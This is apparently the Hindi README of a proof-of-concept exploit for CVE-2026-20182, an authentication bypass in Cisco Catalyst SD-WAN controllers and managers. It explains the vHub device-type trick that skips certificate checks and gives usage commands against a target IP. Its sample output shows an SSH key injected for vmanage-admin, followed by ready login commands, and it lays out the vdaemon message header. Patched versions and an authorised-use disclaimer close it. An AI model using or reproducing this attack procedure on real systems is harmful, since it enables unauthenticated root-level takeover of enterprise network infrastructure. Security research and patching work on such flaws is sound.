
CVE-2026-20182 PoC - Cisco Catalyst SD-WAN नियंत्रक/प्रबंधक प्रमाणीकरण बाईपास (CVSS 10.0)
CVE-2026-20182 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cisco Catalyst SD-WAN नियंत्रक (vSmart) और प्रबंधक (vManage) पर vdaemon DTLS सेवा (UDP/12346) में एक गंभीर (CVSS 10.0) प्रमाणीकरण उपेक्षा है।
प्रकटीकरण: 14 मई 2026 Rapid7 (Stephen Fewer & Jonah Burgess) द्वारा
CISA KEV: 14 मई 2026 को जोड़ा गया (आपातकालीन निर्देश 26-03)
CVSS: 10.0 — CWE-287: अनुचित प्रमाणीकरण
vdaemon सेवा नियंत्रण-प्लेन पीयर्स को प्रमाणित करने के लिए एक बहु-चरणीय DTLS हैंडशेक का उपयोग करती है। vbond_proc_challenge_ack() फ़ंक्शन डिवाइस-प्रकार-विशिष्ट प्रमाणपत्र सत्यापन लागू करता है — लेकिन डिवाइस प्रकार 2 (vHub) में कोई सत्यापन कोड पथ नहीं है। device_type=2 के साथ CHALLENGE_ACK भेजने से फ़ंक्शन हर शर्त को विफल कर देता है और बिना शर्त peer->authenticated = 1 सेट कर देता है।
किसी वैध क्रेडेंशियल, CA-हस्ताक्षरित प्रमाणपत्र, या SD-WAN तैनाती के ज्ञान की आवश्यकता नहीं है।
MSG_VMANAGE_TO_PEER (msg_type=14) के माध्यम से /home/vmanage-admin/.ssh/authorized_keys में एक SSH सार्वजनिक कुंजी इंजेक्ट करता हैvmanage-admin के रूप में NETCONF पहुंच (SSH TCP/830) या SSH पहुंच (TCP/22) प्रदान करता हैpython3 cve-2026-20182.py -t <target> [options]
| तर्क | विवरण |
|---|---|
-t, --target | लक्ष्य IP या होस्टनाम |
--port | vdaemon UDP पोर्ट (डिफ़ॉल्ट: 12346) |
--key-file | इंजेक्ट करने के लिए मौजूदा SSH सार्वजनिक कुंजी का पथ (वैकल्पिक) |
--netconf | SSH के माध्यम से NETCONF से जुड़कर शोषण सत्यापित करें |
# एक नई कुंजी जोड़ी उत्पन्न करें और शोषण करें
python3 cve-2026-20182.py -t 192.168.1.100
# मौजूदा सार्वजनिक कुंजी का उपयोग करें
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# शोषण करें और NETCONF के माध्यम से सत्यापित करें
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
| रिलीज़ | नियत संस्करण |
|---|---|
| < 20.9 | समर्थित रिलीज़ पर माइग्रेट करें |
| 20.9 | 20.9.9.1 |
| 20.10 | 20.12.7.1 |
| 20.11 | 20.12.7.1 |
| 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 |
| 20.13 | 20.15.5.2 |
| 20.14 | 20.15.5.2 |
| 20.15 | 20.15.4.4 / 20.15.5.2 |
| 20.16 | 20.18.2.2 |
| 20.18 | 20.18.2.2 |
| 26.1.1 | 26.1.1.1 |
cisco_sdwan_vhub_auth_bypass — Metasploit फ्रेमवर्क में सहायक मॉड्यूलvdaemon प्रोटोकॉल हेडर 12 बाइट्स का है:
| ऑफसेट | आकार | फील्ड | नोट्स |
|---|---|---|---|
| 0 | 1 | msg_type | निम्न निबल = प्रकार, उच्च निबल = संस्करण |
| 1 | 1 | device_info | उच्च निबल = device_type, निम्न निबल = फ्लैग्स |
| 2 | 1 | flags | मानक मान 0xA0 |
| 3 | 1 | पैडिंग | हमेशा 0x00 |
| 4-7 | 4 | domain_id | बिग-एंडियन uint32 |
| 8-11 | 4 | site_id | बिग-एंडियन uint32 |
डिवाइस प्रकार: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage
openssl CLI (DTLS परिवहन के लिए)cryptography लाइब्रेरी (pip install cryptography)यह एक्सप्लॉइट केवल अधिकृत रेड टीम संचालन, पैठ परीक्षण, और उन सिस्टमों पर सुरक्षा अनुसंधान के लिए है जहाँ आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।